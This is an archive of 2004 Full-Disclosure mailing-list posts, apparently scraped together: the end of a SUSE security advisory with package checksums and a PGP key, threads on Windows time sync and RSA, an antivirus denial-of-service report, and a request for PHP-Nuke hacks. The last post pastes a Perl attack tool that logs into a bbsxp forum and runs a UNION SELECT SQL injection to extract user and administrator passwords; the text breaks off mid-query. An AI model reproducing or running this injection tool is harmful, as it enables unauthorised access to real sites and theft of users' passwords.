    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpdf-0.112.1-26.3.x86_64.rpm
      7021ae8a2e9bc809240c8e953ef74fab
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kdegraphics3-pdf-3.2.1-67.6.x86_64.rpm
      94200c51e06e9f31bc13139ea66c1626
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pdftohtml-0.36-112.3.x86_64.patch.rpm
      e0d057eeb94492d62be6794dfde196c9
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/xpdf-3.00-64.21.x86_64.patch.rpm
      ae9382a68c4d424cdee65324208f9e84
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpdf-0.112.1-26.3.x86_64.patch.rpm
      33a0a7fd7b0758175f465f8f1fa6ce36
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kdegraphics3-pdf-3.2.1-67.6.x86_64.patch.rpm
      c4629d75d822cf47b243cf34bd8cbacb
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/pdftohtml-0.36-112.3.src.rpm
      f2acee920bd51b347e072463edc8f6bc
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/xpdf-3.00-64.21.src.rpm
      5b5c9c5d9aa1ddff06f56f83cf0365d9
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/gpdf-0.112.1-26.3.src.rpm
      2e2b8e6903b724462f30c07db1e76755
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kdegraphics3-3.2.1-67.6.src.rpm
      e6988ea49a337ebd49f42d15afdeb188

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/pdftohtml-0.36-118.x86_64.rpm
      942676168c21ac7253637dd3312e35d1
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/xpdf-2.02pl1-141.x86_64.rpm
      7a5076aec7aae7e6e05bf8d0f6b5e523
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/pdftohtml-0.36-118.x86_64.patch.rpm
      b14da314a640e3afd3e72f417937c461
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/xpdf-2.02pl1-141.x86_64.patch.rpm
      fd4047d3c5392d63040e576effb32df5
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/pdftohtml-0.36-118.src.rpm
      5300f04533ee5b490e1f7de0a29fd705
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/xpdf-2.02pl1-141.src.rpm
      dd9b695199beaea8122037705eb1a581

______________________________________________________________________________

5) pending vulnerabilities in SUSE Distributions and Workarounds:

    - freeradius
      Several bugs that can be abused to remotely crash freeradius have
      been discovered (CAN-2004-0938, CAN-2004-0960, CAN-2004-0961).
      New packages will be available soon.

    - mpg123
      A buffer overflow in mpg123 has been discovered. New packages will
      be available soon.

    - squid
      A bug in the ASN.1 parser of the SNMP module has been fixed which
      would have allowed an attacker to crash squid (CAN-2004-0918).
      Updates will be available soon.

______________________________________________________________________________

6) standard appendix: authenticity verification, additional information

  - Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers all over
    the world. While this service is being considered valuable and important
    to the free and open source software community, many users wish to be
    sure about the origin of the package and its content before installing
    the package. There are two verification methods that can be used
    independently from each other to prove the authenticity of a downloaded
    file or rpm package:
    1) md5sums as provided in the (cryptographically signed) announcement.
    2) using the internal gpg signatures of the rpm package.

    1) execute the command
        md5sum <name-of-the-file.rpm>
       after you downloaded the file from a SUSE ftp server or its mirrors.
       Then, compare the resulting md5sum with the one that is listed in the
       announcement. Since the announcement containing the checksums is
       cryptographically signed (usually using the key securitysuse.de),
       the checksums show proof of the authenticity of the package.
       We disrecommend to subscribe to security lists which cause the
       email message containing the announcement to be modified so that
       the signature does not match after transport through the mailing
       list software.
       Downsides: You must be able to verify the authenticity of the
       announcement in the first place. If RPM packages are being rebuilt
       and a new version of a package is published on the ftp server, all
       md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity
       of an rpm package. Use the command
        rpm -v --checksig <file.rpm>
       to verify the signature of the package, where <file.rpm> is the
       filename of the rpm package that you have downloaded. Of course,
       package authenticity verification can only target an un-installed rpm
       package file.
       Prerequisites:
        a) gpg is installed
        b) The package is signed using a certain key. The public part of this
           key must be installed by the gpg program in the directory
           ~/.gnupg/ under the user's home directory who performs the
           signature verification (usually root). You can import the key
           that is used by SUSE in rpm packages for SUSE Linux by saving
           this announcement to a file ("announcement.txt") and
           running the command (do "su -" to be root):
            gpg --batch; gpg < announcement.txt | gpg --import
           SUSE Linux distributions version 7.1 and thereafter install the
           key "buildsuse.de" upon installation or upgrade, provided that
           the package gpg is installed. The file containing the public key
           is placed at the top-level directory of the first CD (pubring.gpg)
           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  - SUSE runs two security mailing lists to which any interested party may
    subscribe:

    suse-securitysuse.com
        - general/linux/SUSE security discussion.
            All SUSE security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-subscribesuse.com>.

    suse-security-announcesuse.com
        - SUSE's announce-only mailing list.
            Only SUSE's security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-announce-subscribesuse.com>.

    For general information or the frequently asked questions (faq)
    send mail to:
        <suse-security-infosuse.com> or
        <suse-security-faqsuse.com> respectively.

    =====================================================================
    SUSE's security contact is <securitysuse.com> or <securitysuse.de>.
    The <securitysuse.de> public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular,
    it is desired that the clear-text signature shows proof of the
    authenticity of the text.
    SUSE Linux AG makes no warranties of any kind whatsoever with respect
    to the information contained in this security advisory.

Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <securitysuse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <buildsuse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

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
DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=
=LRKC
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iQEVAwUBQX4pgXey5gA9JdPZAQHb0wf+P6dH8VFUyh7nVV8xd6tb/ccBFtpMOaCa
Wq1i0754TcOpk6RKpVpzNEjB2bSh51aWvRykVEguQdo1MlpNZdlE5Zc/T38S+B3U
H2hzK9o2d9FAUxHFEpjSRRQxFdDEP7Hx3JV/OnVIqZfycVij0MaTSN6j9c7GSUZP
SQ97CdbMTgRe25lL2k1FofNaYpDKyng/yF78pxD8dI79abbupcJo7BokPtZ6yEGZ
AL2PT3OhyYX3HJphNJ+4wcRIS71IWhB54kA0igB1Qp83ltROgbz1rr9OgUwf3fDi
zvYGxNX4Eu0rxiaU6U81z+m5dScUoNMSM8CK+uZK/dn3iSHHNzjaLA==
=j7Hh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Airey, John (John.Aireyrnib.org.uk)
Date: Tue Oct 26 2004 - 07:10:21 CDT

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of Andrew
> Farmer
> Sent: 25 October 2004 20:22
> To: Gary E. Miller
> Cc: Micheal Espinola Jr; full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Windows Time Synchronization - Best
> Practices
>
>
> On 24 Oct 2004, at 18:48, Gary E. Miller wrote:
> > On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:
> >> You can certainly have multiple time servers specified with Windows
> >> Time Service (SNTP). RTM. It has the ability to failover
> through a
> >> list.
> >
> > Yes you can have multiple time servers, but only one active
> at a time.
> > With NTP your client polls a number of diverse servers. Routes can
> > flap, servers can go wacko, but your time stays solid.
>
> The canonical *NIX ntp client supports multiple active servers, if
> that's what you're talking about.
>
> No idea about Windows, though.

Getting back to the poster's original question, Windows is really bad
for time synchronisation. Whereas you can set an NTP server to
UTC/GMT/ZULU (or whatever other name you are going to call it), Windows
does indeed move the clock forward and backward.

We've experienced this difficulty ourselves where you log in to a server
which then puts the clock an hour forward and then Windows itself puts
the clock an hour forward. The end result is that the clock is wrong.
Local time should simply be calculated as an offset from UTC. So instead
of changing the clock, change the time zone. Then it won't matter if the
time zone is changed to BST (for example) more than once. The clock and
the offset will stay the same.

Note to Microsoft - fix this stupidity in your next version of Windows.
It will annoy your users to begin with, but a number of time synch
issues will be solved in one fell swoop. All the three letter codes are
publicly available and understood by your end users.

--
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848
John.Aireyrnib.org.uk

Even if Embryonic Stem Cell Research yielded medical treatments, how
could enough eggs be obtained to make them viable? We can't even get
enough organs for transplant donation.

--
DISCLAIMER:

NOTICE: The information contained in this email and any attachments is
confidential and may be privileged. If you are not the intended
recipient you should not use, disclose, distribute or copy any of the
content of it or of any attachment; you are requested to notify the
sender immediately of your receipt of the email and then to delete it
and any attachments from your system.

RNIB endeavours to ensure that emails and any attachments generated by
its staff are free from viruses or other contaminants. However, it
cannot accept any responsibility for any such which are transmitted.
We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email and
any attachments are those of the author and do not necessarily represent
those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Tue Oct 26 2004 - 11:11:31 CDT

Thanks to everyone who replied to this, I appreciate your time.

This issue has now been dealt with.

Ali

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Airey, John (John.Aireyrnib.org.uk)
Date: Tue Oct 26 2004 - 10:47:21 CDT

> -----Original Message-----
> From: Kyle Maxwell [mailto:krmaxwellgmail.com]
> Sent: 25 October 2004 04:30
> To: Airey, John
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Possibly a stupid question RPC
> over HTTP
>
>[snip]
>
> You're talking about solving a problem that DOESN'T EXIST BY
> DEFINITION. Re-read my response -- this time without being stupid --
> and you'll see that I was trying to explain to you that the problem is
> the general factoring of large numbers (into primes for what should be
> obvious reasons). This is NOT the same as factoring large primes as
> that's a solved problem. If this is still difficult to understand, any
> handy grade-school maths book should provide additional explanation.
> Testing for primality, which is a related but different problem, is
> solved, but proving that a number is composite is unfortunately not
> the same as knowing its factors.
> </flame>
>
> As to the question of whether this is a solved problem: we may have to
> agree to disagree; if it were the NSA, given their past interactions
> with the crypto community, I think it likely that they'd have over
> time moved to another type of cryptography. BTW, brute forcing a key
> does not break the system -- and as others have shown in this thread,
> it's impossible to precompute all the keys unless you've broken every
> single PRNG out there, and that's even less likely.

What is it with this list that people can't reply without being rude? Is it the phase of the moon or something? OK, so we can rule out brute force, as storing every prime that's possible with 512bit keys isn't possible in this universe. Anyway, to quote RSA Laboratories:

"The RSA algorithm works as follows: take two large primes, p and q, and compute their product n = pq; n is called the modulus. Choose a number, e, less than n and relatively prime to (p-1)(q-1), which means e and (p-1)(q-1) have no common factors except 1. Find another number d such that (ed - 1) is divisible by (p-1)(q-1). The values e and d are called the public and private exponents, respectively. The public key is the pair (n, e); the private key is (n, d). The factors p and q may be destroyed or kept with the private key.

It is currently difficult to obtain the private key d from the public key (n, e). However if one could factor n into p and q, then one could obtain the private key d. Thus the security of the RSA system is based on the assumption that factoring is difficult" (http://www.rsasecurity.com/rsalabs/node.asp?id=2214)

Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off.
(Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys).

Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else.

This is my last post on the matter which is solely for the purpose of making at least one post in this thread sensible and useful for future readers of the archive. All future abusive emails on my mathematical abilities will be deleted without response.

--
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Aireyrnib.org.uk

Tag line temporarily removed due to several people being unable and/or unwilling to comprehend what I'm talking about.

--
DISCLAIMER:

NOTICE: The information contained in this email and any attachments is
confidential and may be privileged. If you are not the intended
recipient you should not use, disclose, distribute or copy any of the
content of it or of any attachment; you are requested to notify the
sender immediately of your receipt of the email and then to delete it
and any attachments from your system.

RNIB endeavours to ensure that emails and any attachments generated by
its staff are free from viruses or other contaminants. However, it
cannot accept any responsibility for any such which are transmitted.
We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email and
any attachments are those of the author and do not necessarily represent
those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Presentation / Paper : Demystifying Penetration Testing

From: Debasis Mohanty (mailhackingspirits.com)
Date: Tue Oct 26 2004 - 12:04:21 CDT

Hi All,

This is to announce the release of a presentation / paper on PenTesting
by HACKINGSPIRITS called "Demystifying Penetration Testing". It is
mostly targeted for those who are new to Penetration Testing (i.e.
Security Officers / Sys Admins / Security Auditors / Security
Enthusiasts.etc). This presentation will give a clear picture on how pen
testing is done and what are the expected results. Various screenshots
are provided as a proof of concepts to give a brief picture of possible
end-results.

The goals of this presentation / paper are as follows:

- An overview of how Vulnerability Assessment (VA) & Penetration Testing
(PT) is done
- Defining scope of the assessment
- Types of Penetration Testing
- A brief understanding on how Buffer Overflow works
- How vulnerabilities are scanned and exploited
- What are the end results
- What a Penetration Testing Report should contain

 

It can be downloaded from the following link:
http://www.hackingspirits.com/eth-hac/papers/whitepapers.asp

Debasis Mohanty
www.hackingspirits.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: bipin gautam (visitbipinyahoo.com)
Date: Tue Oct 26 2004 - 12:09:16 CDT

ya i've been seeing this behavior since a long time...
but i don't think there is anything serious. Firefox
only slows down (using 100% cpu) if you are using a
slow PC. And after the binary file have been completed
loded. Everything works normal......

frankly, there are lot of such similar bugs. If you
open multiple windows and multiple tabs at once,
firefox locks/reservs the memory (pagefile) that its
using even when some of the tabs are closed. You have
to restart mozilla (close all the open windows) to
free the memory.

huh, nothing serious isn't it......

bipin

                
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Multiple AV DoS (part v)

From: bipin gautam (visitbipinyahoo.com)
Date: Tue Oct 26 2004 - 12:24:53 CDT

Finally, Most, AV softwares seem to handle ZIP ARCHIVE
BOMB easily. Lately, i was impressed with Mcafee
Antivirus But what a pitty, still many AV dies (DoS)
while scanning compressed oversized execudables.

http://www.geocities.com/visitbipin/oversize_exe.zip

Currently I know,

Norton AV 2002/2003/2004 pro.
McAfee 4396
Sybari 7.5.1314
TrendMicro 7.000

……SHOULD BE vulnerable to this bug. I also confirmed
it using www.virustotal.com

WHAT A PITTY. I wonder, when will AV softwares
improve...

bipin gautam

http://www.geocities.com/visitbipin

                
__________________________________
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
http://mobile.yahoo.com/maildemo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
SV: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: Peter Kruse (krusekrusesecurity.dk)
Date: Tue Oct 26 2004 - 12:37:01 CDT

Hi Bipin,

It's not rated as a serious risk, is it? Simply a DoS.

This is not sorely related to trivial memory consumption, neither. The
scenario you're descriping has been around for ages and is related to system
resources. This is not.

Regards
Peter Kruse

>-----Oprindelig meddelelse-----
>Fra: bipin gautam [mailto:visitbipinyahoo.com]
>Sendt: 26. oktober 2004 19:09
>Til: pkrcsis.dk
>Cc: full-disclosurelists.netsys.com
>Emne: Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla
>Firefox stop responding or crash
>
>
>ya i've been seeing this behavior since a long time...
>but i don't think there is anything serious. Firefox
>only slows down (using 100% cpu) if you are using a
>slow PC. And after the binary file have been completed
>loded. Everything works normal......
>
>frankly, there are lot of such similar bugs. If you
>open multiple windows and multiple tabs at once,
>firefox locks/reservs the memory (pagefile) that its
>using even when some of the tabs are closed. You have
>to restart mozilla (close all the open windows) to
>free the memory.
>
>huh, nothing serious isn't it......
>
>bipin
>
>
>
>
>__________________________________
>Do you Yahoo!?
>Yahoo! Mail Address AutoComplete - You start. We finish.
>http://promotions.yahoo.com/new_mail
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Php Nuke Hack's

From: .:: DarkDelphi ::. (darkydelphigmail.com)
Date: Tue Oct 26 2004 - 13:18:51 CDT

Hi, i'm a spanish reader and.. y will try expose myself..

I need hack one site created of mysefl with php-nuke. This site is
hosted in my computed to test the security of Php Nuke. I receantly
use some hack's like SQL Inyection, Cross-Site Scripting and cookie
¿kidnapping? (this last one without good results...)

I use the hack's that i found in
http://packetstorm.security-guide.de/assess/ ... ¿Anyone can write or
send more hack's?

Thanks

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Php Nuke Hack's

str0kemilw0rm.com
Date: Tue Oct 26 2004 - 14:29:33 CDT

Please don't expose yourself.

This is all I got for you.

http://www.milw0rm.com/search.php?dong=php-nuke

On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
<darkydelphigmail.com> wrote:
> Hi, i'm a spanish reader and.. y will try expose myself..
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Php Nuke Hack's

From: ntx0f (ntx0fseteuid.com)
Date: Tue Oct 26 2004 - 15:29:05 CDT

ever consider writing one yourself?

----- Original Message -----
From: <str0kemilw0rm.com>
To: <full-disclosurelists.netsys.com>
Cc: <darkydelphigmail.com>
Sent: Tuesday, October 26, 2004 3:29 PM
Subject: [Full-Disclosure] Php Nuke Hack's

> Please don't expose yourself.
>
> This is all I got for you.
>
> http://www.milw0rm.com/search.php?dong=php-nuke
>
> On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
> <darkydelphigmail.com> wrote:
> > Hi, i'm a spanish reader and.. y will try expose myself..
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Php Nuke Hack's

From: bug free (bugfreegmail.com)
Date: Tue Oct 26 2004 - 15:56:07 CDT

>Please don't expose yourself.
>This is all I got for you.
>http://www.milw0rm.com/search.php?dong=php-nuke

That is not very cool. See my crack tool for bbsxp forum. It works
well on 5.00, 4.0beta3 and beta4.Your crack crack just like watch
moive. It will register user and get the password for you
automatically. ;)

--
Thanks
bugfree

#!/usr/bin/perl
#############################################
# This tool is used to crack bbsxp 5.00(access, MSSQL)
# Deveoped by bugfree ( www.xxxxxx.org )
# Thanks theAres for his help on debuging
#############################################

use IO::Socket;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Cookies;
use LWP;
use LWP::UserAgent;
use HTML::Form;

$version='1.0';
#$username = 'test';
#$password = 'testt';
$namepass = 'test:test';
$username2 = 'zgtqwpmz123';
$password2 = 'gbhnjm';
$fLoginFail = 0;
$fRegistFail =0;

%options=();
getopts("h:u:",\%options);
(defined $options{h} ) || die "Usage(version:" . $version . "):
$0\n\t-h www.abc.com/bbs/\n\t-u username:password\n";
                                                                                
$tmpUrl = $options{h} if defined $options{h};
$namepass = $options{u} if defined $options{u};
str = split(":", $namepass);
$username = $str[0];
$password = $str[1];

if ( $tmpUrl =~ /(http:\/\/)?([a-z0-9.]+)\/(.*)/i ) {
        $webhost = $2;
        $webdir = $3;
        $webUrl = $webhost . '/' . $webdir .'/';
        $webUrl =~ s/\/\//\//;
        $webUrl = 'http://' . $webUrl;
}
else {
        die "Please use format: -h http://www.target.com/bbs/";
}

print "SQL injection for URL: $webUrl \n";

#Global URL
my $loginPage = $webUrl . 'login.asp';
my $searchPage = $webUrl . 'search.asp';
my $registPage = $webUrl . 'register.asp';

my $cookies = HTTP::Cookies->new();
my $ua = LWP::UserAgent->new;
$ua->cookie_jar( $cookies );

#loginRegist();
webLogin( $username, $password );
if ( $fLoginFail == 1 ) {
        loginRegist( $username2, $password2 ); #try 2nd user
        if ( $fRegistFail == 1 ) {
                $fLoginFail = 0;
                webLogin( $username2, $password2 );
                if ( $fLoginFail == 1 ) { die "Sorry, Can not login to web \n"; }
        }
        
}

#sql injection
webSearch();

######################
# Functions list
# loginRegist() :register to bbs
# webLogin() : web login
# webSearch() : web login
######################

sub webSearch
{
        #injection SQL, Leave a space in the end
        $searchxm = 'forumid=0 union all SELECT 1, forum.forumid,
user.userpass, user.username, forum.content, forum.posttime,
forum.postip, forum.replies, forum.Views, forum.icon, forum.goodtopic,
forum.toptopic, forum.locktopic, forum.deltopic, forum.lastname,
forum.lasttime, clubconfig.adminpassword, forum.pollresult ,
forum.multiplicity FROM [user],forum, clubconfig where user.membercode
> 3 OR user.username ';
        
